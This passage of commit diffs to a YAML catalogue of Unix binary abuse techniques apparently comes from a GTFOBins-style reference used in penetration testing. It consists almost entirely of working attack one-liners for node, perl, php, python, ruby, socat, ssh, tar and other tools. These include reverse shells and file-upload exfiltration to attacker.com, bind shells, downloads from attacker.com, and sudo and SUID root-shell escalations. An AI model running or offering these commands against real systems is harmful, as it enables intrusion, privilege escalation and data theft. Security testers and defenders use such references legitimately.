export RHOST=attacker.com
export RPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
net.connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
net.connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'
bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(process.env.LPORT);'
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(process.env.LPORT);'
suid-enabled:
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
1, 2]});''
'
- code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
sudo-enabled:
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
2]});''
'
- code: |
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
---

View File

@ -1,18 +1,16 @@
---
description: |
Three spaces are added before each character in the read file, and
non-printable chars are printed as backslash escape sequences.
description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
functions:
file-read:
- code: |
LFILE=file_to_read
od -An -c -w9999 "$LFILE"
- code: |
LFILE=file_to_read
od -An -c -w9999 "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./od -An -c -w9999 "$LFILE"
- code: |
LFILE=file_to_read
./od -An -c -w9999 "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo od -An -c -w9999 "$LFILE"
- code: |
LFILE=file_to_read
sudo od -An -c -w9999 "$LFILE"
---

View File

@ -1,15 +1,15 @@
---
functions:
execute-interactive:
- code: perl -e 'exec "/bin/sh";'
- code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
- code: ./perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
- code: sudo perl -e 'exec "/bin/sh";'
---

View File

@ -1,50 +1,49 @@
---
functions:
execute-interactive:
- code: |
export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'
- code: |
export CMD="/bin/sh"
php -r 'passthru(getenv("CMD"));'
- code: |
export CMD="/bin/sh"
php -r 'print(shell_exec(getenv("CMD")));'
- code: |
export CMD="/bin/sh"
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
- code: |
export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
- code: |
export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'
- code: |
export CMD="/bin/sh"
php -r 'passthru(getenv("CMD"));'
- code: |
export CMD="/bin/sh"
php -r 'print(shell_exec(getenv("CMD")));'
- code: |
export CMD="/bin/sh"
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
- code: |
export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive:
- code: |
export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
- code: |
export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload:
- description: Serve files in the local folder running an HTTP server. This requires
PHP version 5.4 or later.
code: |
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
code: |
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
suid-enabled:
- code: |
CMD="/bin/sh"
./php -r "system('$CMD');"
- code: |
CMD="/bin/sh"
./php -r "system('$CMD');"
sudo-enabled:
- code: |
CMD="/bin/sh"
sudo php -r "system('$CMD');"
- code: |
CMD="/bin/sh"
sudo php -r "system('$CMD');"
---

View File

@ -1,38 +1,36 @@
---
functions:
execute-non-interactive:
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
pico -s $TF /etc/hosts
^T
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
pico -s $TF /etc/hosts
^T
file-write:
- code: |
pico file_to_write
^O
- code: |
pico file_to_write
^O
file-read:
- code: 'pico file_to_read
'
- code: pico file_to_read
suid-enabled:
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF
./pico -s $TF /etc/hosts
^T
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF
./pico -s $TF /etc/hosts
^T
sudo-enabled:
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo pico -s $TF /etc/hosts
^T
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo pico -s $TF /etc/hosts
^T
---

View File

@ -1,24 +1,23 @@
---
functions:
execute-non-interactive:
- description: The executed command output shown in the puppet log format.
code: |
export CMD="/usr/bin/id"
puppet apply -e "exec { '$CMD': logoutput => true }"
- description: The executed command output shown in the puppet log format.
code: |
export CMD="/usr/bin/id"
puppet apply -e "exec { '$CMD': logoutput => true }"
file-write:
- description: The file path must be absolute.
code: |
export LFILE="/tmp/file_to_write"
puppet apply -e "file { '$LFILE': content => 'data' }"
- description: The file path must be absolute.
code: |
export LFILE="/tmp/file_to_write"
puppet apply -e "file { '$LFILE': content => 'data' }"
file-read:
- description: The read file content is corrupted by the `diff` output format. The
actual `/usr/bin/diff` command is executed.
code: |
export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
code: |
export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE
sudo-enabled:
- description: The executed command output shown in the puppet log format.
code: |
export CMD="/usr/bin/id"
sudo puppet apply -e "exec { '$CMD': logoutput => true }"
- description: The executed command output shown in the puppet log format.
code: |
export CMD="/usr/bin/id"
sudo puppet apply -e "exec { '$CMD': logoutput => true }"
---

View File

@ -1,39 +1,37 @@
---
functions:
execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")'
- code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an
HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=8888
python2 -m SimpleHTTPServer $LPORT
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=8888
python2 -m SimpleHTTPServer $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
file-write:
- code: python2 -c 'open("file_to_write","w+").write("data")'
- code: python2 -c 'open("file_to_write","w+").write("data")'
file-read:
- code: python2 -c 'open("file_to_read").read()'
- code: python2 -c 'open("file_to_read").read()'
load-library:
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled:
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
sudo-enabled:
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
---

View File

@ -1,39 +1,37 @@
---
functions:
execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")'
- code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an
HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- description: Serve files in the local folder running an HTTP server.
code: |
LPORT=8888
python3 -m http.server $LPORT
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- description: Serve files in the local folder running an HTTP server.
code: |
LPORT=8888
python3 -m http.server $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
file-write:
- code: python3 -c 'open("file_to_write","w+").write("data")'
- code: python3 -c 'open("file_to_write","w+").write("data")'
file-read:
- code: python3 -c 'open("file_to_read").read()'
- code: python3 -c 'open("file_to_read").read()'
load-library:
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled:
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
---

View File

@ -1,15 +1,14 @@
---
functions:
execute-interactive:
- code: rlwrap /bin/sh
- code: rlwrap /bin/sh
file-write:
- description: This adds timestamps to the output file. This relies on the external
`echo` command.
code: |
LFILE=file_to_write
rlwrap -l "$LFILE" echo data
- description: This adds timestamps to the output file. This relies on the external `echo` command.
code: |
LFILE=file_to_write
rlwrap -l "$LFILE" echo data
suid-enabled:
- code: "./rlwrap -H /dev/null /bin/sh -p"
- code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled:
- code: sudo rlwrap /bin/sh
- code: sudo rlwrap /bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
---

View File

@ -1,33 +1,32 @@
---
functions:
execute-interactive:
- code: ruby -e 'exec "/bin/sh"'
- code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload:
- description: Serve files in the local folder running an HTTP server. This requires
version 1.9.2 or later.
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
export RPORT=12345
export RFILE=/file_to_get
export LFILE=file_to_save
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
export RPORT=12345
export RFILE=/file_to_get
export LFILE=file_to_save
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
file-write:
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
file-read:
- code: ruby -e 'puts File.read("file_to_read")'
- code: ruby -e 'puts File.read("file_to_read")'
load-library:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"'
- code: sudo ruby -e 'exec "/bin/sh"'
---

View File

@ -1,36 +1,36 @@
---
functions:
execute-non-interactive:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
chmod +x "$TF"
scp -S $TF x y:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
chmod +x "$TF"
scp -S $TF x y:
upload:
- description: Send local file to a SSH server.
code: |
RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send
scp $LFILE $RPATH
- description: Send local file to a SSH server.
code: |
RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send
scp $LFILE $RPATH
download:
- description: Fetch a remote file from a SSH server.
code: |
RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save
scp $RPATH $LFILE
- description: Fetch a remote file from a SSH server.
code: |
RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save
scp $RPATH $LFILE
sudo-enabled:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
chmod +x "$TF"
sudo scp -S $TF x y:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
chmod +x "$TF"
sudo scp -S $TF x y:
suid-limited:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
chmod +x "$TF"
./scp -S $TF a b:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
chmod +x "$TF"
./scp -S $TF a b:
---

View File

@ -1,24 +1,24 @@
---
functions:
execute-interactive:
- description: GNU version only. Also, this requires `bash`.
code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
- description: GNU version only. Also, this requires `bash`.
code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
execute-non-interactive:
- description: GNU version only.
code: sed -n "1e id" /etc/hosts
- description: GNU version only.
code: sed -n "1e id" /etc/hosts
file-write:
- code: |
LFILE=file_to_write
sed -n "1s/.*/data/w $LFILE" /etc/hosts
- code: |
LFILE=file_to_write
sed -n "1s/.*/data/w $LFILE" /etc/hosts
file-read:
- code: |
LFILE=file_to_read
sed '' "$LFILE"
- code: |
LFILE=file_to_read
sed '' "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./sed -e '' "$LFILE"
- code: |
LFILE=file_to_read
./sed -e '' "$LFILE"
sudo-enabled:
- description: GNU version only. Also, this requires `bash`.
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
- description: GNU version only. Also, this requires `bash`.
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: setarch $(arch) /bin/sh
- code: setarch $(arch) /bin/sh
suid-enabled:
- code: "./setarch $(arch) /bin/sh -p"
- code: ./setarch $(arch) /bin/sh -p
sudo-enabled:
- code: sudo setarch $(arch) /bin/sh
- code: sudo setarch $(arch) /bin/sh
---

View File

@ -1,25 +1,25 @@
---
functions:
execute-interactive:
- code: |
HOST=user@attacker.com
sftp $HOST
!/bin/sh
- code: |
HOST=user@attacker.com
sftp $HOST
!/bin/sh
upload:
- description: Send local file to a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save
- description: Send local file to a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save
download:
- description: Fetch a remote file from a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save
- description: Fetch a remote file from a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save
sudo-enabled:
- code: |
HOST=user@attacker.com
sudo sftp $HOST
!/bin/sh
- code: |
HOST=user@attacker.com
sudo sftp $HOST
!/bin/sh
---

View File

@ -2,16 +2,16 @@
description: The read file content is corrupted by adding a newline.
functions:
file-write:
- code: |
LFILE=file_to_write
shuf -e data -o "$LFILE"
- code: |
LFILE=file_to_write
shuf -e data -o "$LFILE"
suid-enabled:
- description:
code: |
LFILE=file_to_write
./shuf -e data -o "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_write
sudo shuf -e data -o "$LFILE"
- description:
code: |
LFILE=file_to_write
./shuf -e data -o "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_write
sudo shuf -e data -o "$LFILE"
---

View File

@ -1,16 +1,14 @@
---
functions:
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code>
on the attacker box to connect to the shell.
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
sort -m "$LFILE"
- code: |
LFILE=file_to_read
sort -m "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./sort -m "$LFILE"
- code: |
LFILE=file_to_read
./sort -m "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo sort -m "$LFILE"
- code: |
LFILE=file_to_read
sudo sort -m "$LFILE"
---

View File

@ -1,21 +1,21 @@
---
functions:
execute-interactive:
- code: sqlite3 /dev/null '.shell /bin/sh'
- code: sqlite3 /dev/null '.shell /bin/sh'
file-write:
- code: |
LFILE=file_to_write
sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
- code: |
LFILE=file_to_write
sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
file-read:
- code: |
LFILE=file_to_read
sqlite3 << EOF
CREATE TABLE t(line TEXT);
.import $LFILE t
SELECT * FROM t;
EOF
- code: |
LFILE=file_to_read
sqlite3 << EOF
CREATE TABLE t(line TEXT);
.import $LFILE t
SELECT * FROM t;
EOF
sudo-enabled:
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
suid-limited:
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
---

View File

@ -1,32 +1,30 @@
---
functions:
execute-interactive:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
x
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
upload:
- description: Send local file to a SSH server.
code: |
HOST=user@attacker.com
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
- description: Send local file to a SSH server.
code: |
HOST=user@attacker.com
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
download:
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@attacker.com
RPATH=file_to_get
LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@attacker.com
RPATH=file_to_get
LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH
file-read:
- description: The read file content is corrupted by error prints.
code: |
LFILE=file_to_read
ssh -F $LFILE localhost
- description: The read file content is corrupted by error prints.
code: |
LFILE=file_to_read
ssh -F $LFILE localhost
sudo-enabled:
- description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh
-i'" x
- description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: stdbuf -i0 /bin/sh
- code: stdbuf -i0 /bin/sh
suid-enabled:
- code: "./stdbuf -i0 /bin/sh -p"
- code: ./stdbuf -i0 /bin/sh -p
sudo-enabled:
- code: sudo stdbuf -i0 /bin/sh
- code: sudo stdbuf -i0 /bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: strace -o /dev/null /bin/sh
- code: strace -o /dev/null /bin/sh
suid-enabled:
- code: "./strace -o /dev/null /bin/sh -p"
- code: ./strace -o /dev/null /bin/sh -p
sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh
- code: sudo strace -o /dev/null /bin/sh
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
tail -c1G "$LFILE"
- code: |
LFILE=file_to_read
tail -c1G "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./tail -c1G "$LFILE"
- code: |
LFILE=file_to_read
./tail -c1G "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo tail -c1G "$LFILE"
- code: |
LFILE=file_to_read
sudo tail -c1G "$LFILE"
---

View File

@ -1,24 +1,24 @@
---
functions:
execute-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive:
- description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
- description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write:
- description: This only works for GNU tar.
code: |
LFILE=file_to_write
TF=$(mktemp)
echo data > "$TF"
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
- description: This only works for GNU tar.
code: |
LFILE=file_to_write
TF=$(mktemp)
echo data > "$TF"
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
file-read:
- description: This only works for GNU tar.
code: |
LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
- description: This only works for GNU tar.
code: |
LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
